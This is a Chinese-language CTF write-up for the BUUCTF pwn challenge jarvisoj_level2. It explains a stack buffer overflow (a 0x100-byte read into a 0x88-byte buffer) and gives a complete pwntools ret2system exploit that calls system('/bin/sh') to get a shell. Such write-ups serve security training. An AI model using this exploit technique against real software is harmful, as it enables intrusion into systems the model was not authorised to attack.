BUUCT_PWN8 jarvisoj_level2

jarvisoj_level2

查看保护措施：

canary没有，很好。
栈可执行，这题也可以在栈上写shellcode。
PIE都没开，从IDA看到的地址就是实际加载的地址了。

IDA 静态分析

vulnerable_function 里面 read 读了 0x100 字节，但是 buf 只有 0x88 字节，缓冲区溢出。

那么思路很简单

ida 找 '/bin/sh'

system肯定是有了，可以从符号表中取出地址

exp:

from pwn import *

r = process("./level2")
elf = ELF("./level2")

sys_addr = elf.symbols['system']
bin_sh_addr = 0x0804A024

payload = b'A'*(0x88+4)
payload += p32(sys_addr)
payload += b'AAAA'
payload += p32(bin_sh_addr)

r.sendline(payload)
r.interactive()

本栏目推荐文章
• 《RAPL: A Relation-Aware Prototype Learning Approach for Few-Shot Document-Level Relation Extraction》阅读笔记
• 《An End-to-end Model for Entity-level Relation Extraction using Multi-instance Learning》阅读笔记
• jarvisoj_level4
• Lab 1-Vulnhub - Kioptix Level 1
• 逆向通达信Level-2 续十一 (无帐号登陆itrend研究版)
• 《A Novel Table-to-Graph Generation Approach for Document-Level Joint Entity and Relation Extraction》阅读笔记
• jarvisoj_level3_x64
• jarvisoj_level3
• Python - pandas 报错：ValueError: 'HIS_批准文号' is both an index level and a column label, which is ambiguous.
• [论文阅读] Learning Component-Level and Inter-Class Glyph Representation for few-shot Font Generation

jarvisoj_level BUUCT_PWN jarvisoj BUUCT leveljarvisoj_level buuct_pwn jarvisoj buuct jarvisoj_level jarvisoj level jarvisoj_level jarvisoj_level jarvisoj level 64 jarvisoj_level jarvisoj level pwn jarvisoj_level jarvisoj buuctf level buuct_pwn buuct jarvisoj jarvisoj_fm